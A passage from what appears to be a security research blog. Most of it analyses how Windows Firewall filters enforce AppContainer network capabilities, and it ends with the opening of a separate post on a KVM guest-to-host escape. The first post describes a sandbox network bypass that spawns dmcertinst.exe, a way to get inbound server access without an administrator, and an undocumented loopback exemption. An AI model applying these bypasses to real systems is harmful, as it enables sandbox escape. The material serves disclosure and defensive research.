  • privateNetworkClientServer - Grants client and server access to local private networks.

Client Capabilities

Pretty much all Windows Store applications are granted the internetClient capability as accessing the Internet is a thing these days. Even the built-in calculator has this capability, presumably so you can fill in feedback on how awesome a calculator it is.

Image showing the list of capabilities granted to Windows calculator application showing the “Your Internet Connection” capability is granted.

However, this shouldn't grant the ability to act as a network server, for that you need the internetClientServer capability. Note that Windows defaults to blocking incoming connections, so just because you have the server capability still doesn't ensure you can receive network connections. The final capability is privateNetworkClientServer which grants access to private networks as both a client and a server. What is the internet and what is private isn't made immediately clear, hopefully we'll find out from inspecting the firewall configuration.

PS> $token = Get-NtToken -LowBox -PackageSid TEST

PS> $addr = Resolve-DnsName "www.google.com" -Type A

PS> $sock = Invoke-NtToken $token {

>>   [System.Net.Sockets.TcpClient]::new($addr.IPAddress, 80)

>> }

Exception calling ".ctor" with "2" argument(s): "An attempt was made to access a socket in a way forbidden by its access permissions 216.58.194.164:80"

PS> $template = New-FwNetEventTemplate

PS> Add-FwCondition $template -IPAddress $addr.IPAddress -Port 80

PS> Add-FwCondition $template -NetEventType ClassifyDrop

PS> Get-FwNetEvent -Template $template | Format-List

FilterId               : 71079

LayerId                : 48

ReauthReason           : 0

...

PS> Get-FwFilter -Id 71079 | Format-FwFilter

Name       : Block Outbound Default Rule

Action Type: Block

Key        : fb8f5cab-1a15-4616-b63f-4a0d89e527f8

Id         : 71079

Description: Block Outbound Default Rule

Layer      : FWPM_LAYER_ALE_AUTH_CONNECT_V4

Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_WSH

Flags      : None

Weight     : 274877906944

Conditions :

FieldKeyName                  MatchType Value

------------                  --------- -----

FWPM_CONDITION_ALE_PACKAGE_ID NotEqual  NULL SID

In the above output we first create a lowbox token for testing the AppContainer access. In this example we don't provide any capabilities for the token so we're expecting the network connection should fail. Next we connect a TcpClient socket while impersonating the lowbox token, and the connection is immediately blocked with an error.

We then get the network event corresponding to the connection request to see what filter blocked the connection. Formatting the filter from the network event we find the “Block Outbound Default Rule”. This will block any AppContainer network connection, based on the FWPM_CONDITION_ALE_PACKAGE_ID condition which hasn't been permitted by higher priority firewall filters.

Like with the “Default Outbound” filter we saw earlier, this is a backstop if nothing else matches. Unlike that earlier filter the default is to block rather than permit the connection. Another thing to note is the sublayer name. For “Block Outbound Default Rule” it's MICROSOFT_DEFENDER_SUBLAYER_WSH which is used for built-in filters which aren't directly visible from the Defender firewall configuration. Whereas MICROSOFT_DEFENDER_SUBLAYER_FIREWALL is used for “Default Outbound”, which is a lower priority sublayer (based on its weight) and thus would never be evaluated due to the higher priority block.

Okay, we know how connections are blocked. Therefore there must be a higher priority filter which permits the connection within the MICROSOFT_DEFENDER_SUBLAYER_WSH sublayer. We could go back to manual inspection, but we might as well just see what the network event shows as the matching filter when we grant the internetClient capability.

PS> $cap = Get-NtSid -KnownSid CapabilityInternetClient

PS> $token = Get-NtToken -LowBox -PackageSid TEST -CapabilitySid $cap

PS> Set-FwEngineOption -NetEventMatchAnyKeywords ClassifyAllow

PS> $sock = Invoke-NtToken $token {

>>   [System.Net.Sockets.TcpClient]::new($addr.IPAddress, 80)

>> }

PS> Set-FwEngineOption -NetEventMatchAnyKeywords None

PS> $template = New-FwNetEventTemplate

PS> Add-FwCondition $template -IPAddress $addr.IPAddress -Port 80

PS> Add-FwCondition $template -NetEventType ClassifyAllow

PS> Get-FwNetEvent -Template $template | Format-List

FilterId        : 71075

LayerId         : 48

ReauthReason    : 0

...

PS> Get-FwFilter -Id 71075 | Format-FwFilter

Name       : InternetClient Default Rule

Action Type: Permit

Key        : 406568a7-a949-410d-adbb-2642ec3e8653

Id         : 71075

Description: InternetClient Default Rule

Layer      : FWPM_LAYER_ALE_AUTH_CONNECT_V4

Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_WSH

Flags      : None

Weight     : 412316868544

Conditions :

FieldKeyName                       MatchType Value

------------                       --------- -----

FWPM_CONDITION_ALE_PACKAGE_ID      NotEqual  NULL SID

FWPM_CONDITION_IP_REMOTE_ADDRESS   Range    

Low: 0.0.0.0 High: 255.255.255.255

FWPM_CONDITION_ORIGINAL_PROFILE_ID Equal     Public

FWPM_CONDITION_CURRENT_PROFILE_ID  Equal     Public

FWPM_CONDITION_ALE_USER_ID         Equal    

O:LSD:(A;;CC;;;S-1-15-3-1)(A;;CC;;;WD)(A;;CC;;;AN)

In this example we create a new token using the same package SID but with internetClient capability. When we connect the socket we now no longer get an error and the connection is permitted. Checking for the ClassifyAllow event we find the “InternetClient Default Rule” filter matched the connection.

Looking at the conditions we can see that it will only match if the socket creator is in an AppContainer based on the FWPM_CONDITION_ALE_PACKAGE_ID condition. The FWPM_CONDITION_ALE_USER_ID also ensures that it will only match if the creator has the internetCapability capability which is S-1-15-3-1 in the SDDL format. This filter is what's granting access to the network.

One odd thing is in the FWPM_CONDITION_IP_REMOTE_ADDRESS condition. It seems to match on all possible IPv4 addresses. Shouldn't this exclude network addresses on our local “private” network? At the very least you'd assume this would block the reserved IP address ranges from RFC1918? The key to understanding this is the profile ID conditions, which are both set to Public. The computer I'm running these commands on has a single network interface configured to the public profile as shown:

Image showing the option of either Public or Private network profiles.

Therefore the firewall is configured to treat all network addresses in the same context, granting the internetClient capability access to any address including your local “private” network. This might be unexpected. In fact if you enumerate all the filters on the machine you won't find any filter to match the privateNetworkClientServer capability and using the capability will not grant access to any network resource.

If you switch the network profile to Private, you'll find there's now three “InternetClient Default Rule” filters (note on Windows 11 there will only be one as it uses the OR'ing feature of conditions as mentioned above to merge the three rules together).

Name       : InternetClient Default Rule

Action Type: Permit

...

------------                       --------- -----

FWPM_CONDITION_ALE_PACKAGE_ID      NotEqual  NULL SID

FWPM_CONDITION_IP_REMOTE_ADDRESS   Range    

Low: 0.0.0.0 High: 10.0.0.0

FWPM_CONDITION_ORIGINAL_PROFILE_ID Equal     Private

FWPM_CONDITION_CURRENT_PROFILE_ID  Equal     Private

...

Name       : InternetClient Default Rule

Action Type: Permit

Conditions :

FieldKeyName                       MatchType Value

------------                       --------- -----

FWPM_CONDITION_ALE_PACKAGE_ID      NotEqual  NULL SID

FWPM_CONDITION_IP_REMOTE_ADDRESS   Range    

Low: 239.255.255.255 High: 255.255.255.255

...

Name       : InternetClient Default Rule

Action Type: Permit

...

Conditions :

FieldKeyName                       MatchType Value

------------                       --------- -----

FWPM_CONDITION_ALE_PACKAGE_ID      NotEqual  NULL SID

FWPM_CONDITION_IP_REMOTE_ADDRESS   Range    

Low: 10.255.255.255 High: 224.0.0.0

...

As you can see in the first filter, it covers addresses 0.0.0.0 to 10.0.0.0. The machine's private network is 10.0.0.0/8. The profile IDs are also now set to Private. The other two exclude the entire 10.0.0.0/8 network as well as the multicast group addresses from 224.0.0.0 to 240.0.0.0.

The profile ID conditions are important here if you have more than one network interface. For example if you have two, one Public and one Private, you would get a filter for the Public network covering the entire IP address range and the three Private ones excluding the private network addresses. The Public filter won't match if the network traffic is being sent from the Private network interface preventing the application without the right capability from accessing the private network.

Speaking of which, we can also now identify the filter which will match the private network capability. There's two, to cover the private network range and the multicast range. We'll just show one of them.

Name       : PrivateNetwork Outbound Default Rule

Action Type: Permit

Key        : e0194c63-c9e4-42a5-bbd4-06d90532d5e6

Id         : 71640

Description: PrivateNetwork Outbound Default Rule

Layer      : FWPM_LAYER_ALE_AUTH_CONNECT_V4

Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_WSH

Flags      : None

Weight     : 36029209335832512

Conditions :

FieldKeyName                       MatchType Value

------------                       --------- -----

FWPM_CONDITION_ALE_PACKAGE_ID      NotEqual  NULL SID

FWPM_CONDITION_IP_REMOTE_ADDRESS   Range    

Low: 10.0.0.0 High: 10.255.255.255

FWPM_CONDITION_ORIGINAL_PROFILE_ID Equal     Private

FWPM_CONDITION_CURRENT_PROFILE_ID  Equal     Private

FWPM_CONDITION_ALE_USER_ID         Equal    

O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)

We can see in the FWPM_CONDITION_ALE_USER_ID condition that the connection would be permitted if the creator has the privateNetworkClientServer capability, which is S-1-15-3-3 in SDDL.

It is slightly ironic that the Public network profile is probably recommended even if you're on your own private network (Windows 11 even makes the recommendation explicit as shown below) in that it should reduce the exposed attack surface of the device from others on the network. However if an AppContainer application with the internetClient capability could be compromised it opens up your private network to access where the Private profile wouldn't.

Image showing the option of either Public or Private network profiles. This is from Windows 11 where Public is marked as recommended.

Aside: one thing you might wonder, if your network interface is marked as Private and the AppContainer application only has the internetClient capability, what happens if your DNS server is your local router at 10.0.0.1? Wouldn't the application be blocked from making DNS requests? Windows has a DNS client service which typically is always running. This service is what usually makes DNS requests on behalf of applications as it allows the results to be cached. The RPC server which the service exposes allows callers which have any of the three network capabilities to connect to it and make DNS requests, avoiding the problem. Of course if the service is disabled in-process DNS lookups will start to be used, which could result in weird name resolving issues depending on your network configuration.

We can now understand how issue 2207 I reported to Microsoft bypasses the capability requirements. If in the MICROSOFT_DEFENDER_SUBLAYER_WSH sublayer for an outbound connection there are Permit filters which are evaluated before the “Block Outbound Default Rule” filter then it might be possible to avoid needing capabilities.

PS> Get-FwFilter -AleLayer ConnectV4 -Sorted |

Where-Object SubLayerKeyName -eq MICROSOFT_DEFENDER_SUBLAYER_WSH |

Select-Object ActionType, Name

...

Permit     Allow outbound TCP traffic from dmcertinst.exe

Permit     Allow outbound TCP traffic from omadmclient.exe

Permit     Allow outbound TCP traffic from deviceenroller.exe

Permit     InternetClient Default Rule

Permit     InternetClientServer Outbound Default Rule

Block      Block all outbound traffic from SearchFilterHost

Block      Block outbound traffic from dmcertinst.exe

Block      Block outbound traffic from omadmclient.exe

Block      Block outbound traffic from deviceenroller.exe

Block      Block Outbound Default Rule

Block      WSH Default Outbound Block

PS> Get-FwFilter -Id 72753 | Format-FwFilter

Name       : Allow outbound TCP traffic from dmcertinst.exe

Action Type: Permit

Key        : 5237f74f-6346-4038-a48d-4b779f862e65

Id         : 72753

Description:

Layer      : FWPM_LAYER_ALE_AUTH_CONNECT_V4

Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_WSH

Flags      : Indexed

Weight     : 422487342972928

Conditions :

FieldKeyName               MatchType Value

------------               --------- -----

FWPM_CONDITION_ALE_APP_ID  Equal    

\device\harddiskvolume3\windows\system32\dmcertinst.exe

FWPM_CONDITION_IP_PROTOCOL Equal     Tcp

As we can see in the output there are quite a few Permit filters before the “Block Outbound Default Rule” filter, and of course I've also cropped the list to make it smaller. If we inspect the “Allow outbound TCP traffic from dmcertinst.exe” filter we find that it only matches on the App ID and the IP protocol. As it doesn't have an AppContainer specific checks, then any sockets created in the context of a dmcertinst process would be permitted to make TCP connections.

Once the “Allow outbound TCP traffic from dmcertinst.exe” filter matches the sublayer evaluation is terminated and it never reaches the “Block Outbound Default Rule” filter. This is fairly trivial to exploit, as long as the AppContainer process is allowed to spawn new processes, which is allowed by default.

Server Capabilities

What about the internetClientServer capability, how does that function? First, there's a second set of outbound filters to cover the capability with the same network addresses as the base internetClient capability. The only difference is the FWPM_CONDITION_ALE_USER_ID condition checks for the internetClientServer (S-1-15-3-2) capability instead. For inbound connections the FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4 layer contains the filter.

PS> Get-FwFilter -AleLayer RecvAcceptV4 -Sorted |

Where-Object Name -Match InternetClientServer |

Format-FwFilter

Name       : InternetClientServer Inbound Default Rule

Action Type: Permit

Key        : 45c5f1d5-6ad2-4a2a-a605-4cab7d4fb257

Id         : 72470

Description: InternetClientServer Inbound Default Rule

Layer      : FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4

Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_WSH

Flags      : None

Weight     : 824633728960

Conditions :

FieldKeyName                       MatchType Value

------------                       --------- -----

FWPM_CONDITION_ALE_PACKAGE_ID      NotEqual  NULL SID

FWPM_CONDITION_IP_REMOTE_ADDRESS   Range    

Low: 0.0.0.0 High: 255.255.255.255

FWPM_CONDITION_ORIGINAL_PROFILE_ID Equal     Public

FWPM_CONDITION_CURRENT_PROFILE_ID  Equal     Public

FWPM_CONDITION_ALE_USER_ID         Equal    

O:LSD:(A;;CC;;;S-1-15-3-2)(A;;CC;;;WD)(A;;CC;;;AN)

The example shows the filter for a Public network interface granting an AppContainer application the ability to receive network connections. However, this will only be permitted if the socket creator has internetClientServer capability. Note, there would be similar rules for the private network if the network interface is marked as Private but only granting access with the privateNetworkClientServer capability.

As mentioned earlier just because an application has one of these capabilities doesn't mean it can receive network connections. The default configuration will block the inbound connection.  However, when an UWP application is installed and requires one of the two server capabilities, the AppX installer service registers the AppContainer profile with the Windows Defender Firewall service. This adds a filter to permit the AppContainer package to receive inbound connections. For example the following is for the Microsoft Photos application, which is typically installed by default:

PS> Get-FwFilter -Id 68299 |

Format-FwFilter -FormatSecurityDescriptor -Summary

Name       : @{Microsoft.Windows.Photos_2021...

Action Type: Permit

Key        : 7b51c091-ed5f-42c7-a2b2-ce70d777cdea

Id         : 68299

Description: @{Microsoft.Windows.Photos_2021...

Layer      : FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4

Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_FIREWALL

Flags      : Indexed

Weight     : 10376294366095343616

Conditions :

FieldKeyName                  MatchType Value

------------                  --------- -----

FWPM_CONDITION_ALE_PACKAGE_ID Equal    

microsoft.windows.photos_8wekyb3d8bbwe

FWPM_CONDITION_ALE_USER_ID    Equal     O:SYG:SYD:(A;;CCRC;;;S-1-5-21-3563698930-1433966124...

<Owner> (Defaulted) : NT AUTHORITY\SYSTEM

<Group> (Defaulted) : NT AUTHORITY\SYSTEM

<DACL>

DOMAIN\alice: (Allowed)(None)(Full Access)

APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:...

APPLICATION PACKAGE AUTHORITY\Your Internet connection:...

APPLICATION PACKAGE AUTHORITY\Your Internet connection,...

APPLICATION PACKAGE AUTHORITY\Your home or work networks:...

NAMED CAPABILITIES\Proximity: (Allowed)(None)(Full Access)

The filter only checks that the package SID matches and that the socket creator is a specific user in an AppContainer. Note this rule doesn't do any checking on the executable file, remote IP address, port or profile ID. Once an installed AppContainer application is granted a server capability it can act as a server through the firewall for any traffic type or port.

A normal application could abuse this configuration to run a network service without needing the administrator access normally required to grant the executable access. All you'd need to do is create an arbitrary AppContainer process in the permitted package and grant it the internetClientServer and/or the privateNetworkClientServer capabilities. If there isn't an application installed which has the appropriate firewall rules a non-administrator user can install any signed application with the appropriate capabilities to add the firewall rules. While this clearly circumvents the expected administrator requirements for new listening processes it's presumably by design.

Localhost Access

One of the specific restrictions imposed on AppContainer applications is blocking access to localhost. The purpose of this is it makes it more difficult to exploit local network services which might not correctly handle AppContainer callers creating a sandbox escape. Let's test the behavior out and try to connect to a localhost service.

PS> $token = Get-NtToken -LowBox -PackageSid "LOOPBACK"

PS> Invoke-NtToken $token {

    [System.Net.Sockets.TcpClient]::new("127.0.0.1", 445)

}

Exception calling ".ctor" with "2" argument(s): "A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because

connected host has failed to respond 127.0.0.1:445"

If you compare the error to when we tried to connect to an internet address without the appropriate capability you'll notice it's different. When we connected to the internet we got an immediate error indicating that access isn't permitted. However, for localhost we instead get a timeout error, which is preceded by multi-second delay. Why the difference? Getting the network event which corresponds to the connection and displaying the blocking filter shows something interesting.

PS> Get-FwFilter -Id 69039 |

Format-FwFilter -FormatSecurityDescriptor -Summary

Name       : AppContainerLoopback

Action Type: Block

Key        : a58394b7-379c-43ac-aa07-9b620559955e

Id         : 69039

Description: AppContainerLoopback

Layer      : FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4

Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_WSH

Flags      : None

Weight     : 18446744073709551614

Conditions :

FieldKeyName               MatchType   Value

------------               ---------   -----

FWPM_CONDITION_FLAGS       FlagsAllSet IsLoopback

FWPM_CONDITION_ALE_USER_ID Equal      

O:LSD:(A;;CC;;;AC)(A;;CC;;;S-1-15-3-1)(A;;CC;;;S-1-15-3-2)...

<Owner> : NT AUTHORITY\LOCAL SERVICE

<DACL>

APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES...

APPLICATION PACKAGE AUTHORITY\Your Internet connection...

APPLICATION PACKAGE AUTHORITY\Your Internet connection, including...

APPLICATION PACKAGE AUTHORITY\Your home or work networks...

NAMED CAPABILITIES\Proximity: (Allowed)(None)(Match)

Everyone: (Allowed)(None)(Match)

NT AUTHORITY\ANONYMOUS LOGON: (Allowed)(None)(Match)

The blocking filter is not in the connect layer as you might expect, instead it's in the receive/accept layer. This explains why we get a timeout rather than immediate failure: the “inbound” connection request is being dropped as per the default configuration. This means the TCP client waits for the response from the server, until it eventually hits the timeout limit.

The second interesting thing to note about the filter is it's not based on an IP address such as 127.0.0.1. Instead it's using a condition which checks for the IsLoopback condition flag (FWP_CONDITION_FLAG_IS_LOOPBACK in the SDK). This flag indicates that the connection is being made through the built-in loopback network, regardless of the destination address. Even if you access the public IP addresses for the local network interfaces the packets will still be routed through the loopback network and the condition flag will be set.

The user ID check is odd, in that the security descriptor matches either AppContainer or non-AppContainer processes. This is of course the point, if it didn't match both then it wouldn't block the connection. However, it's not immediately clear what its actual purpose is if it just matches everything. In my opinion, it adds a risk that the filter will be ignored if the socket creator has disabled the Everyone group.  This condition was modified for supporting LPAC over Windows 8, so it's presumably intentional.

You might ask, if the filter would block any loopback connection regardless of whether it's in an AppContainer, how do loopback connections work for normal applications? Wouldn't this filter always match and block the connection?  Unsurprisingly there are some additional permit filters before the blocking filter as shown below.

PS> Get-FwFilter -AleLayer RecvAcceptV4 -Sorted |

Where-Object Name -Match AppContainerLoopback | Format-FwFilter

Name       : AppContainerLoopback

Action Type: Permit

...

Conditions :

FieldKeyName         MatchType   Value

------------         ---------   -----

FWPM_CONDITION_FLAGS FlagsAllSet IsAppContainerLoopback

Name       : AppContainerLoopback

Action Type: Permit

...

Conditions :

FieldKeyName         MatchType   Value

------------         ---------   -----

FWPM_CONDITION_FLAGS FlagsAllSet IsReserved

Name       : AppContainerLoopback

Action Type: Permit

...

Conditions :

FieldKeyName         MatchType   Value

------------         ---------   -----

FWPM_CONDITION_FLAGS FlagsAllSet IsNonAppContainerLoopback

The three filters shown above only check for different condition flags, and you can find documentation for the flags on MSDN. Starting at the bottom we have a check for IsNonAppContainerLoopback. This flag is set on a connection when the loopback connection is between non-AppContainer created sockets. This filter is what grants normal applications loopback access. It's also why an application can listen on localhost even if it's not granted access to receive connections from the network in the firewall configuration.

In contrast the first filter checks for the IsAppContainerLoopback flag. Based on the documentation and the name, you might assume this would allow any AppContainer to use loopback to any other. However, based on testing this flag is only set if the two AppContainers have the same package SID. This is presumably to allow an AppContainer to communicate with itself or other processes within its package through loopback sockets.

This flag is also, I suspect, the reason that connecting to a loopback socket is handled in the receive layer rather than the connect layer. Perhaps WFP can't easily tell ahead of time whether both the connecting and receiving sockets will be in the same AppContainer package, so it delays resolving that until the connection has been received. This does lead to the unfortunate behavior that blocked loopback sockets timeout rather than fail immediately.

The final flag, IsReserved is more curious. MSDN of course says this is “Reserved for future use.”, and the future is now. Though checking back at the filters in Windows 8.1 also shows it being used, so if it was reserved it wasn't for very long. The obvious conclusion is this flag is really a “Microsoft Reserved” flag, by that I mean it's actually used but Microsoft is yet unwilling to publicly document it.

What is it used for? AppContainers are supposed to be a capability based system, where you can just add new capabilities to grant additional privileges. It would make sense to have a loopback capability to grant access, which could be restricted to only being used for debugging purposes. However, it seems that loopback access was so beyond the pale for the designers that instead you can only grant access for debug purposes through an administrator only API. Perhaps it's related?

PS> Add-AppModelLoopbackException -PackageSid "LOOPBACK"

PS> Get-FwFilter -AleLayer ConnectV4 |

Where-Object Name -Match AppContainerLoopback |

Format-FwFilter -FormatSecurityDescriptor -Summary

Name       : AppContainerLoopback

Action Type: CalloutInspection

Key        : dfe34c0f-84ca-4af1-9d96-8bf1e8dac8c0

Id         : 54912247

Description: AppContainerLoopback

Layer      : FWPM_LAYER_ALE_AUTH_CONNECT_V4

Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_WSH

Flags      : None

Weight     : 18446744073709551615

Callout Key: FWPM_CALLOUT_RESERVED_AUTH_CONNECT_LAYER_V4

Conditions :

FieldKeyName               MatchType Value

------------               --------- -----

FWPM_CONDITION_ALE_USER_ID Equal     D:(A;NP;CC;;;WD)(A;NP;CC;;;AN)(A;NP;CC;;;S-1-15-3-1861862962-...

<DACL>

Everyone: (Allowed)(NoPropagateInherit)(Match)

NT AUTHORITY\ANONYMOUS LOGON: (Allowed)(NoPropagateInherit)(Match)

PACKAGE CAPABILITY\LOOPBACK: (Allowed)(NoPropagateInherit)(Match)

LOOPBACK: (Allowed)(NoPropagateInherit)(Match)

First we add a loopback exemption for the LOOPBACK package name. We then look for the AppContainerLoopback filters in the connect layer. The one we're interested in is shown. The first thing to note is that the action type is set to CalloutInspection. This might seem slightly surprising, you would expect it'd do something more than inspecting the traffic.

The name of the callout, FWPM_CALLOUT_RESERVED_AUTH_CONNECT_LAYER_V4 gives the game away. The fact that it has RESERVED in the name can't be a coincidence. This callout is one implemented internally by Windows in the TCPIP!WfpAlepDbgLowboxSetByPolicyLoopbackCalloutClassify function. This name now loses all mystery and pretty much explains what its purpose is, which is to configure the connection so that the IsReserved flag is set when the receive layer processes it.

The user ID here is equally important. When you register the loopback exemption you only specify the package SID, which is shown in the output as the last “LOOPBACK” line. Therefore you'd assume you'd need to always run your code within that package. However, the penultimate line is “PACKAGE CAPABILITY\LOOPBACK” which is my module's way of telling you that this is the package SID, but converted to a capability SID. This is basically changing the first relative identifier in the SID from 2 to 3.

We can use this behavior to simulate a generic loopback exemption capability. It allows you to create an AppContainer sandboxed process which has access to localhost which isn't restricted to a particular package. This would be useful for applications such as Chrome to implement a network facing sandboxed process and would work from Windows 8 through 11. . Unfortunately it's not officially documented so can't be relied upon. An example demonstrating the use of the capability is shown below.

PS> $cap = Get-NtSid -PackageSid "LOOPBACK" -AsCapability

PS> $token = Get-NtToken -LowBox -PackageSid "TEST" -cap $cap

PS> $sock = Invoke-NtToken $token {

    [System.Net.Sockets.TcpClient]::new("127.0.0.1", 445)

}

PS> $sock.Client.RemoteEndPoint

AddressFamily Address   Port

------------- -------   ----

 InterNetwork 127.0.0.1  445

Conclusions

That wraps up my quick overview of how AppContainer network restrictions are implemented using the Windows Firewall. I covered the basics of the Windows Firewall as well as covered some of my tooling I wrote to do analysis of the configuration. This background information allowed me to explain why the issue I reported to Microsoft worked. I also pointed out some of the quirks of the implementation which you might find of interest.

Having a good understanding of how a security feature works is an important step towards finding security issues. I hope that by providing both the background and tooling other researchers can also find similar issues and try and get them fixed.

An EPYC escape: Case-study of a KVM breakout

Posted by Felix Wilhelm, Project Zero

Introduction

KVM (for Kernel-based Virtual Machine) is the de-facto standard hypervisor for Linux-based cloud environments. Outside of Azure, almost all large-scale cloud and hosting providers are running on top of KVM, turning it into one of the fundamental security boundaries in the cloud.

In this blog post I describe a vulnerability in KVM’s AMD-specific code and discuss how this bug can be turned into a full virtual machine escape. To the best of my knowledge, this is the first public writeup of a KVM guest-to-host breakout that does not rely on bugs in user space components such as QEMU. The discussed bug was assigned CVE-2021-29657, affects kernel versions v5.10-rc1 to v5.12-rc6 and was patched at the end of March 2021. As the bug only became exploitable in v5.10 and was discovered roughly 5 months later, most real world deployments of KVM should not be affected. I still think the issue is an interesting case study in the work required to build a stable guest-to-host escape against KVM and hope that this writeup can strengthen the case that hypervisor compromises are not only theoretical issues.

I start with a short overview of KVM’s architecture, before diving into the bug and its exploitation.

KVM

KVM is a Linux based open source hypervisor supporting hardware accelerated virtualization on x86, ARM, PowerPC and S/390. In contrast to the other big open source hypervisor Xen, KVM is deeply integrated with the Linux Kernel and builds on its scheduling, memory management and hardware integrations to provide efficient virtualization.

KVM is implemented as one or more kernel modules (kvm.ko plus kvm-intel.ko or kvm-amd.ko on x86) that expose a low-level IOCTL-based API to user space processes over the /dev/kvm device. Using this API, a user space process (often called VMM for Virtual Machine Manager) can create new VMs, assign vCPUs and memory, and intercept memory or IO accesses to provide access to emulated or virtualization-aware hardware devices. QEMU has been the standard user space choice for KVM-based virtualization for a long time, but in the last few years alternatives like LKVM, crosvm or Firecracker have started to become popular.

While KVM’s reliance on a separate user space component might seem complicated at first, it has a very nice benefit: Each VM running on a KVM host has a 1:1 mapping to a Linux process, making it managable using standard Linux tools.

This means for example, that a guest's memory can be inspected by dumping the allocated memory of its user space process or that resource limits for CPU time and memory can be applied easily. Additionally, KVM can offload most work related to device emulation to the userspace component. Outside of a couple of performance-sensitive devices related to interrupt handling, all of the complex low-level code for providing virtual disk, network or GPU access can be implemented in userspace.  

When looking at public writeups of KVM-related vulnerabilities and exploits it becomes clear that this design was a wise decision. The large majority of disclosed vulnerabilities and all publicly available exploits affect QEMU and its support for emulated/paravirtualized devices.

Even though KVM’s kernel attack surface is significantly smaller than the one exposed by a default QEMU configuration or similar user space VMMs, a KVM vulnerability has advantages that make it very valuable for an attacker:

  • Whereas user space VMMs can be sandboxed to reduce the impact of a VM breakout, no such option is available for KVM itself. Once an attacker is able to achieve code execution (or similarly powerful primitives like write access to page tables) in the context of the host kernel, the system is fully compromised.
  • Due to the somewhat poor security history of QEMU, new user space VMMs like crosvm or Firecracker are written in Rust, a memory safe language. Of course, there can still be non-memory safety vulnerabilities or problems due to incorrect or buggy usage of the KVM APIs, but using Rust effectively prevents the large majority of bugs that were discovered in C-based user space VMMs in the past.
  • Finally, a pure KVM exploit can work against targets that use proprietary or heavily modified user space VMMs. While the big cloud providers do not go into much detail about their virtualization stacks publicly, it is safe to assume that they do not depend on an unmodified QEMU version for their production workloads. In contrast, KVM’s smaller code base makes heavy modifications unlikely (and KVM’s contributor list points at a strong tendency to upstream such modifications when they exist).  

With these advantages in mind, I decided to spend some time hunting for a KVM vulnerability that could be turned into a guest-to-host escape. In the past, I had some success with finding vulnerabilities in KVM’s support for nested virtualization on Intel CPUs so reviewing the same functionality for AMD seemed like a good starting point. This is even more true, because the recent increase of AMD’s market share in the server segment means that KVM’s AMD implementation is suddenly becoming a more interesting target than it was in the last years.

Nested virtualization, the ability for a VM (called L1) to spawn nested guests (L2), was also a niche feature for a long time. However, due to hardware improvements that reduce its overhead and increasing customer demand it’s becoming more widely available. For example, Microsoft is heavily pushing for Virtualization-based Security as part of newer Windows versions, requiring nested virtualization to support cloud-hosted Windows installations. KVM enables support for nested virtualization on both AMD and Intel by default, so if an administrator or the user space VMM does not explicitly disable it, it’s part of the attack surface for a malicious or compromised VM.

AMD’s virtualization extension is called SVM (for Secure Virtual Machine) and in order to support nested virtualization, the host hypervisor needs to intercept all SVM instructions that are executed by its guests, emulate their behavior and keep its state in sync with the underlying hardware. As you might imagine, implementing this correctly is quite difficult with a large potential for complex logic flaws, making it a perfect target for manual code review.

The Bug

Before diving into the KVM codebase and the bug I discovered, I want to quickly introduce how AMD SVM works to make the rest of the post easier to understand. (For a thorough documentation see AMD64 Architecture Programmer’s Manual, Volume 2: System Programming Chapter 15.) SVM adds support for 6 new instructions to x86-64 if SVM support is enabled by setting the SVME bit in the EFER MSR. The most interesting of these instructions is VMRUN, which (as its name suggests) is responsible for running a guest VM. VMRUN takes an implicit parameter via the RAX register pointing to the page-aligned physical address of a data structure called “virtual machine control block” (VMCB), which describes the state and configuration of the VM.

The VMCB is split into two parts: First, the State Save area, which stores the values of all guest registers, including segment and control registers. Second, the Control area which describes the configuration of the VM. The Control area describes the virtualization features enabled for a VM,  sets which VM actions are intercepted to trigger a VM exit and stores some fundamental configuration values such as the page table address used for nested paging.

If the VMCB is correctly prepared (and we are not already running in a VM), VMRUN will first save the host state in a memory region called the host save area, whose address is configured by writing a physical address to the VM_HSAVE_PA MSR. Once the host state is saved, the CPU switches to the VM context and VMRUN only returns once a VM exit is triggered for one reason or another.

An interesting aspect of SVM is that a lot of the state recovery after a VM exit has to be done by the hypervisor. Once a VM exit occurs, only RIP, RSP and RAX are restored to the previous host values and all other general purpose registers still contain the guest values. In addition, a full context switch requires manual execution of the VMSAVE/VMLOAD instructions which save/load additional system registers (FS, SS, LDTR, STAR, LSTAR …) from memory.

For nested virtualization to work, KVM intercepts execution of the VMRUN instruction and creates its own VMCB based on the VMCB the L1 guest prepared (called vmcb12 in KVM terminology). Of course, KVM can’t trust the guest provided vmcb12 and needs to carefully validate all fields that end up in the real VMCB that gets passed to the hardware (known as vmcb02).

Most of the KVM’s code for nested virtualization on AMD is implemented in arch/x86/kvm/svm/nested.c and the code that intercepts VMRUN instructions of nested guests is implemented in nested_svm_vmrun:

int nested_svm_vmrun(struct vcpu_svm *svm)

{

        int ret;

        struct vmcb *vmcb12;

        struct vmcb *hsave = svm->nested.hsave;

        struct vmcb *vmcb = svm->vmcb;

        struct kvm_host_map map;

        u64 vmcb12_gpa;

   

        vmcb12_gpa = svm->vmcb->save.rax; ** 1 ** 

        ret = kvm_vcpu_map(&svm->vcpu, gpa_to_gfn(vmcb12_gpa), &map); ** 2 **

        …

        ret = kvm_skip_emulated_instruction(&svm->vcpu);

        vmcb12 = map.hva;

        if (!nested_vmcb_checks(svm, vmcb12)) { ** 3 **

                vmcb12->control.exit_code    = SVM_EXIT_ERR;

                vmcb12->control.exit_code_hi = 0;

                vmcb12->control.exit_info_1  = 0;

                vmcb12->control.exit_info_2  = 0;

                goto out;

        }

        ...

        /*

         * Save the old vmcb, so we don't need to pick what we save, but can

         * restore everything when a VMEXIT occurs

         */

        hsave->save.es     = vmcb->save.es;

        hsave->save.cs     = vmcb->save.cs;

        hsave->save.ss     = vmcb->save.ss;

